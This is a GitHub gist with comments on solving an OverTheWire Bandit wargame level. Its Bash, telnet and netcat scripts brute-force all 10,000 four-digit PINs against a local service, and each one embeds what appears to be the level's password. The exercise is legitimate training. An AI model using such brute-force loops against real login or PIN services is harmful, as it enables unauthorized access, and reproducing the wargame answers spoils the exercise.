Last active
October 5, 2022 06:29
-
-
Save vinzdef/7bdf4249e67a2ff7ed3f to your computer and use it in GitHub Desktop.
4 digit pin bruteforce using Bash expansions for Over The Wire bandit25
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| for x in {0..9}{0..9}{0..9}{0..9}; do | |
| echo UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $x | telnet localhost 30002 | egrep -v "Exiting|Wrong|I am"; | |
| echo "Try $x"; | |
| done |
seq -f %04g 10000 | xargs printf "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ %s\n" | nc localhost 30002 | grep bandit25
Fieel's answer is by far the best.
I combined all of the steps into a single script with 2 second sleeps between the major steps and I got the password much faster than some of the other solutions. It is interesting that netcat can handle so many attempts at once. It's almost like it was designed for brute forcing...
I guess I could have actually made the txt files from inside the script and made them writable as well to improve on the script.
for a in {0..9}{0..9}{0..9}{0..9}; do
echo $passwd' '$a >> combinations.txt
done
sleep 2.0
cat combinations.txt | nc localhost 30002 >> result.txt
sleep 2.0
sort result.txt | uniq -u
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
oneliner: for i in {0000..9999}; do echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002 | grep -v "I am the pincode" | grep -v "Exiting." | grep -v "Wrong"; done